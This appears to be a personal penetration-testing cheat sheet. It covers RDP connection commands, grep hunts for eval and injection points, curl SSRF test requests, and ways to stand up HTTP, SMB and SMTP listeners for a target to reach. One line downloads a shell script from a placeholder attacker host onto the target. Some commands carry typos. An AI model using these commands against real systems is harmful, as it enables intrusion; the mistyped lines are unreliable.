by XFreeRDP
xfreerdp +nego +sec-rdp +sec-tls +sec-nla /d: /u: /p: /v:machineName /u:username /p:userPassword /size:1780x1108
xfreerdp +nego +sec-rdp +sec-tls +sec-nla /d: /u: /p: /v:machineName /u:username /p:userPassword /size:1180x708### cat with line numbers
cat -n filename.ext
### nano with line numbers
nano -c filename.ext
### search for injected sql commands
sudo tail -f /var/log/mysql/mysql.log | grep token_searchForUserTable
### quick download command from target machine
wget https://attacker:800/shell.py -P /tmp/
### sort file alphabetically
### remove the status codes
### remove the leading forward slash
### then save the results to a new text file
sort endpoints.txt | cut -d" “ -f1 | cut -d”/" -f2 > endpoints_sorted.txt
### curl example
curl -i -X POST http://apigateway:8000/files/import
curl -i -X POST -H “Content-Type:application/json” -d ‘{"url":"http://192.168.119.120/ssrftest"}’ http://apigateway:8000/files/import
#### Web Server
sudo python3 -m http.server 80
# If Python version returned above is 3.X
python3 -m http.server
# If Python version returned above is 2.X
python2 -m SimpleHTTPServer
#### start local apache web server
sudo systemctl start apahe2
#### check log file
sudo tail -f /var/log/apache2/access.logSamba Server
1 – Create the folder that will be shared
mkdir /home/kali/class2 – Use the Impacket tool
sudo impacket-smbserver class /home/kali/classDONE – from target they can now hit the attacker’s shared directory, for example in Windows Explorer
\attackerIP\classSMTPD
Start a SMPTD server to listen for incoming SMTP connections and use the DebuggingServer flag to discard the messages after the SMPTD server receives them.
sudo pyton3 -m smtpd -n -c DebuggingServer 0.0.0.0:25grep
grep -rnw “eval(” . --color
-r is recursive
-n show line number
-w match whole word
### Look for use of eval function for exploitation
grep -rnw "eval(" . --color
### continuously print out the end of the mysql.log
sudo tail -f /var/log/mysql/mysql.log | grep token_searchForUserTable
### Searching for:
### $_user_location = 'public';
### using a grep search
grep -rnw /var/www/html/target -e "^.*user_location.*public.*" --color
### A quick grep search such as the following
### helps us find the searchFriends function implementation.
grep -rnw /var/www/html/ATutor -e "function searchFriends" --color
grep -r “document.write” ./ --include *.html
### grep for all script tags that also have a source set,
### removing any entries that are in vendor, plugin, or lib folders
cat commands.html | grep -E “script.*src” | grep -Ev “vendor|lib|plugin”
### search for all instances of toJson
### and then use -v flag to look for the .send keyword
grep -r “toJson” ./ --exclude="compressed*" | grep -v “.send”
grep -r “setup(” ./ --exclude="compressed*"
# Gold find :
this.WebsocketSudo.setup(this.getVar('websocket_url'), this.getVar('akey'));
grep =rl ‘<insert tableName="API_KEYS">’ ./